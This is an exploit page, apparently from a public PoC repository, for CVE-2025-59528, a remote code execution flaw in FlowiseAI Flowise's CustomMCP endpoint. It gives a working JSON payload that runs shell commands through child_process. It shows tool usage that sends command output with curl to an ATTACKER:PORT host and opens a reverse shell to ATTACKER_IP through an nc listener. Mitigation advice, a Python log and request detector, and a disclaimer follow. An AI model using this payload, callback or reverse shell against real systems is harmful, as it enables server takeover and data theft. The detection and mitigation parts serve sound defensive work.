## https://sploitus.com/exploit?id=0BE42E60-0AF7-5A6A-BDE6-3B3550243F5B
# CVE-2025-59528 - FlowiseAI CustomMCP Remote Code Execution
**CVSS 10.0 (Critical)** | **Blind RCE** | **Affected: FlowiseAI Flowise >= 2.2.7-patch.1, < 3.0.6**
### Payload
```json
{
  "loadMethod": "listActions",
  "inputs": {
    "mcpServerConfig": "{x:(function(){const cp=process.mainModule.require('child_process');cp.exec('COMMAND',()=>{});return 1;})()}"
  }
}
```
## Usage
```bash
pip install requests
```
### Check if target is vulnerable (time-based)
```bash
python3 exploit.py -t http://target:3000 --mode check --email user@email.com --password pass
```
### Blind command execution
```bash
# Exfiltrate output via callback
python3 exploit.py -t http://target:3000 --mode exec \
-c "curl http://ATTACKER:PORT/\$(id | base64)" \
--email user@email.com --password pass
```
### Reverse shell
```bash
# Start listener
nc -lvnp 4444
# Fire exploit (auto-tries bash, nc, python)
python3 exploit.py -t http://target:3000 --mode revshell \
--lhost ATTACKER_IP --lport 4444 \
--email user@email.com --password pass
```
### Authentication options
```bash
# JWT auth (Flowise >= 3.0.1)
--email user@email.com --password pass
# Basic auth (Flowise < 3.0.1)
```
## Mitigation
- **Upgrade** to Flowise >= 3.0.6
- **Restrict** API access via firewall/VPN
- **Enable** authentication on all instances
- **Monitor** logs for POST requests to `/api/v1/node-load-method/customMCP`
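The monitoring bullet above can be turned into a concrete check. The following is an added example for defenders, not part of the exploit tool or of Flowise itself. It does two things: it flags access-log lines that carry a POST to `/api/v1/node-load-method/customMCP`, and, for a captured request body, it flags an `inputs.mcpServerConfig` value that is not strict JSON. The PoC payload on this page is a JavaScript object literal containing a function call, which a strict JSON parser rejects, so "config that does not parse as JSON" is a useful signal. The log-line format and all sample lines and bodies below are constructed for the example; adapt the regex to whatever your reverse proxy or Flowise logger actually emits.

```python
"""Detection helpers for CVE-2025-59528 probing (added example, not the page's own code)."""
import json
import re
from typing import Iterable

TARGET_PATH = "/api/v1/node-load-method/customMCP"

# Constructed access-log lines in a combined-log-like shape (assumption: your proxy logs
# method and path this way). Two POSTs from 10.0.0.9 hit the vulnerable endpoint.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Oct/2025:10:01:02 +0000] "GET /api/v1/chatflows HTTP/1.1" 200 512
10.0.0.9 - - [12/Oct/2025:10:01:07 +0000] "POST /api/v1/node-load-method/customMCP HTTP/1.1" 200 27
10.0.0.9 - - [12/Oct/2025:10:01:09 +0000] "POST /api/v1/node-load-method/customMCP?x=1 HTTP/1.1" 500 0
10.0.0.5 - - [12/Oct/2025:10:02:00 +0000] "GET /api/v1/node-load-method/customMCP HTTP/1.1" 404 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def suspicious_requests(lines: Iterable[str]) -> list[dict]:
    """Return one record per POST to the customMCP load-method endpoint.

    The query string is stripped before comparing so `?x=1` variants still match;
    GETs to the same path are ignored because the PoC only works via POST.
    """
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: not this detector's job
        path = m["path"].split("?", 1)[0]
        if m["method"] == "POST" and path == TARGET_PATH:
            hits.append({"ip": m["ip"], "ts": m["ts"], "status": int(m["status"])})
    return hits


def config_is_strict_json(body: dict) -> bool:
    """True if inputs.mcpServerConfig is absent, already an object, or a string that
    strict JSON parsing turns into an object. A JS object literal such as the PoC's
    `{x:(function(){...})()}` fails json.loads and is therefore reported as suspicious."""
    cfg = body.get("inputs", {}).get("mcpServerConfig")
    if cfg is None or isinstance(cfg, dict):
        return True
    if not isinstance(cfg, str):
        return False
    try:
        parsed = json.loads(cfg)
    except json.JSONDecodeError:
        return False
    return isinstance(parsed, dict)


# Constructed request bodies: a benign MCP server config and a non-JSON literal shaped
# like the PoC (the function body here is harmless; only the structure matters).
BENIGN_BODY = {
    "loadMethod": "listActions",
    "inputs": {"mcpServerConfig": '{"command": "npx", "args": ["-y", "some-mcp-server"]}'},
}
SUSPICIOUS_BODY = {
    "loadMethod": "listActions",
    "inputs": {"mcpServerConfig": "{x:(function(){return 1;})()}"},
}


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG.splitlines()):
        print("POST to customMCP endpoint:", hit)
    for name, body in (("benign", BENIGN_BODY), ("suspicious", SUSPICIOUS_BODY)):
        print(name, "config strict JSON:", config_is_strict_json(body))
```

Run it on a real access log with `suspicious_requests(open(path))`; a POST to this path from an instance that is not supposed to expose CustomMCP configuration to users, or any config string that fails the strict-JSON check, is worth an alert on unpatched versions.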
## References
- [NVD - CVE-2025-59528](https://nvd.nist.gov/vuln/detail/CVE-2025-59528)
- [GitHub Advisory - GHSA-3gcm-f6qx-ff7p](https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-3gcm-f6qx-ff7p)
- [SonicWall Threat Analysis](https://www.sonicwall.com)
- [Fix Commit - Flowise v3.0.6](https://github.com/FlowiseAI/Flowise/releases/tag/v3.0.6)
## Disclaimer
This tool is provided for **authorized security testing and educational purposes only**. Unauthorized access to computer systems is illegal. Always obtain proper authorization before testing.